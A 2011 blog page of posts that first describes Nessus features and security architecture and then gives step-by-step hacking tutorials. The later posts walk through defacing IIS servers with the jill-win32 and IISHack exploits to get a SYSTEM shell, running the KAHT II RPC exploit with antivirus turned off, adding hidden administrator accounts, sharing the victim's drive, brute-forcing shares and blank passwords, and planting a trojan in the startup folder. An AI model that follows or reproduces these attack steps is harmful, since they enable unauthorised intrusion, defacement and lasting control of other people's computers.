Monday 31 October 2011

Nessus Security Scanner

Nessus Security Scanner
According to the popular consensus, Nessus  is by far among the best choices of vulnerability scanners. What’s more, it’s part of the Gnu’s Not Unix (GNU) General
Public License (GPL) and can therefore be obtained and utilized at no charge.
The following are some of the features of Nessus:

Plugin Architecture
 Each security test is written as an external plugin. This
means that you can easily add your own tests without having to read the code
of the nessusd engine.

Nessus Attack Scripting Language.
Nessus Security Scanner includes Nessus
Attack Scripting Language (NASL), a language designed to write security tests
easily and quickly. (Security checks can also be written in the C programming
language.)

Up-to-Date Security Vulnerability Database. 
 Nessus focuses mostly on the
development of security checks for recent security holes.

Client/Server Architecture. 
Nessus Security Scanner is made up of two parts:
a server, which performs the attacks, and a client, which is the front end. You
can run the server and the client on different systems. That is, you can audit
your whole network from your personal computer, whereas the server performs
its attacks from the mainframe, which is “upstairs.” There are three clients: one
for X11, one for Win32, and one written in Java.

Test Capability on an Unlimited Number of Hosts Simultaneously
Depending on the power of the station on which you run the Nessus server, you can test 2,
10, or 40 hosts at the same time.

Smart Service Recognition. 
Nessus does not believe that target hosts will respect
the Internet Assigned Numbers Authority (IANA) port numbers. This means
that Nessus will recognize an FTP server running on a nonstandard port (say,
31337) or a Web server running on port 8080.

Multiples Services.
Imagine that you run two or more Web servers on your
host—one on port 80, the other on port 8080. Nessus will test the security of
both ports.

Cooperation Tests. 
The security tests performed by Nessus cooperate so that
nothing useless is made. If your FTP server does not offer anonymous logins,
then anonymous-related security checks will not be performed.

Cracker Behavior. 
Nessus does not trust that version x.y.z of a given software
is immune to a security problem. Ninety-five percent of the security checks will
actually perform their job, so you should try to overflow your buffers, relay
some mails, and even crash your computer!
Complete Reports. Nessus will not only tell you what’s wrong on your network,
but will, most of the time, tell you how to prevent crackers from exploiting the
security holes found and will give you the risk level, from low to very high, of
each problem found.
Exportable Reports. The Unix client can export Nessus reports as ASCII text,
LaTeX, HTML, “spiffy” HTML , and an easy-to-parse
file format.

Full SSL Support. Nessus has the capability to test Secure Socket Layer (SSL)-
ized services, such as HTTPs, SMTPs, and IMAPs. You can even supply Nessus
with a certificate so that it can integrate into a public key infrastructure (PKI).

Smart Plugins. Nessus will determine which plugins should or should
not be launched against the remote host . This option is called optimizations.
Nondestructive.  If you don’t want to risk bringing down services on
your network, you can enable the “safe checks” option of Nessus, which will
make Nessus rely on banners rather than exploit real flaws to determine
whether a vulnerability is present.
Read More »
Posted by RAJPUT HOSTEL at 10:29 pm 0 comments
Labels:

Security Architecture

Security Architecture
Security provided by IT Systems can be defined as the IT system’s ability to be able to protect confidentiality and integrity of processed data, as well as to be able to provide availability of the system and data.

“IT Architecture” may be defined as a set of design artifacts, that are relevant for describing an object such that it can be produced to requirements (quality) as well as maintained over the period of its useful life. The design artifact describe the structure of components, their inter-relationships, and the principles and guidelines governing their design and evolution over time.

Consequently the definition of “IT Security Architecture” may be considered as:

The design artifacts that describe how the security controls are positioned and how they relate to the overall IT Architecture. These controls serve the purpose to maintain the system’s quality attributes, among them confidentiality, integrity and availability.

Security qualities are often considered as Non-functional requirements when systems are designed. In other words they are not required for the system to meet its functional goals such as processing financial transactions, but are needed for a given level of assurance that the system will perform to meet the functional requirements that have been defined.

In recent years there has been a trend towards a hierarchy of control objectives, controls and specific technical implementations of controls, which are implemented within a given security architecture in order to meet the security requirements.
Read More »
Posted by RAJPUT HOSTEL at 10:14 pm 0 comments
Labels:

Server Hacking

IIS ( Web server/web page) hacking

IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing a IIS server is actually very easy. Alot of system administrators does not load patches on their IIS servers so they are the people who gets defaced (hacked). Current IIS servers I will show u to hack is IIS 4/5. IIS 6 is the industry standard at the moment, but there is still alot of IIS4/5 servers online. The way IIS server are being hacked is though buffer overflows and exploits. This is when a certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there is alot of IIS hacking tools making it easy for anyone to hack a IIS server. Not all webservers are run on IIS, there is many other webserver software out there like Apache. We will only be dealing with IIS servers.

Firstly you have to find a IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running.. Another way is to telnet to the IP on port 80. In dos prompt (Start, Run,CMD) type in : telnet 196.35.45.21 80. It will open telnet and show you what IIS the host is running. Web servers normally runs on port 80, but it can be any other specified port.

If you find a IIS server, it's time to DEFACE it :) Go check on my IIS hacking page for IIS hacking programs. We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt (Start, Run) run jill-win32. It will show you this :

iis5 remote .printer overflow.
dark spyrit < hack@me.org> / beavuh labs.
usage: jill-win32

An example how to use it :

jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs it IIS service on, 196.89.65.45. is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, which TFPD32 listening on.

Here is a another example :

Download IISHack and do the following :

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.hackme.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)


C:\WINNT\system32>whoami

NT AUTHORITY\SYSTEM
For those people who does not have a clue what's going on in here, go the script kiddie way and download the other GUI ( graphical user interface ) IIS hacking programs from my IIS page and let the program deface the web page for you. There is a few IIS tutorials in Windows hacker misc section.

Read More »
Posted by RAJPUT HOSTEL at 10:08 pm 0 comments
Labels:

MAC address

Getting a PC name, MAC address and user name logged on

So you would like to know someone's PC name, or their MAC address of their network card or the username that currently logged onto the PC? It can be very useful to have this info on someone. Their PC name can be their own name or company name. Their MAC address is the address of their network card, which is static, means that it can never change. Their username can also be useful if you would like to know this persons name. All of this can only be retrieved if the person has a network card installed on their PC.

In DOS prompt (Start, Run) type in " nbtstat -a IP"

EX : nbstat -a 196.35.24.15, it will show something like this :

Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
PCNAME <00> UNIQUE Registered
DOMAINNAME<00> GROUP Registered
PCNAME<03> UNIQUE Registered
PCNAME<20> UNIQUE Registered
DOMAINNAME <1E> GROUP Registered
USERNAME <03> UNIQUE Registered

MAC Address = 00-22-AE-43-33-30

It will show you the PC name, domain name if it is connected to a domain and it will show the user name logged onto the PC. The MAC is static, meaning it never changes, useful for identifying someone. Your buddy attacks you, you check his IP and you do a "nbtstat" on him, and you gets his MAC address. So now if you check on his PC, and see he has got the same MAC address you know it was him attacking you.
Read More »
Posted by RAJPUT HOSTEL at 10:03 pm 0 comments
Labels:

Hacking a PC with a exploit

Hacking a PC with a exploit

What is a exploit? It's a poorly coded piece in software which you can use to gain access to the system. There is many exploits available for the various MS Windows's out there. Windows Hacker exploit download page which has compiled exploits.

Now if your a n00b, you don't know how to compile an exploit, basically you need some programming experience, so go learn how to program. Most exploits are written in C++ so try Bloodshed Dev C++ which you can use to compile exploits.

Read this tutorial about compiling exploits.

But you can download exploits which other people has already compiled. If someone updates their PC when new exploits comes out, you can't exploit them. but if they don't update and install new patches, the chance you can exploit and gain access to their PC is big.

Check this example of how a exploit works:

KAHT II - MASSIVE RPC EXPLOIT

This is a exploit for Win2k/XP and its already compiled, you can download it from the Windows Hacker exploits section.

This is an explanation of how to use it :

1. Get target IP, make sure it uses XP or 2k

2. Download exploit tool
(make sure to deactivate your AV)

3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101

note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1

4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------

Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

5. NOW.. YOU ARE IN TARGET DRIVE

6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password

7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user

8. Sharing drive
C:\WINNT\system32>net share c=c:

9. Exit from target.. dont forget!
C:\WINNT\system32>exit

10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here

There you will now have a mapped drive to the target PC and an administrator account.
Read More »
Posted by RAJPUT HOSTEL at 9:59 pm 0 comments
Labels:

Hacking a PC through NetBios shares

Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printing enabled, so mostly computers with an network card. If you find a computer with a share, use Windows to connect to that share.
Go START, RUN and type in "\\IP\sharename". Example "\\198.55.77.216\c" or with the PC name "\\pc1\c" - then you will have access to the share, to delete, copy or rename files or directories, depending what it was shared as, but most people share things with full access and no password. If you find a PC with shares, but when you try and connect to it, it ask you a password, the easy way to crack it is with PQWak, this program brute force cracks the password for you - Win9X only.

Windows NT/XP, works through permissions, so if something is shared, it is shared with permissions to the folder, and permissions is given to an user name. But alot of people make shares with full access to anyone. Win2K/XP accessing an share like the C$ share will ask you an username and password, if there is no password specified by the person who's PC it is.. Trying username as Administrator and password blank. Most people got administrator account password blank, easy way to get onto their shares.

Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.

If you gain access to someone's hard drive, copy a trojan server file into their startup folder, and then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan.
Read More »
Posted by RAJPUT HOSTEL at 9:55 pm 0 comments
Labels: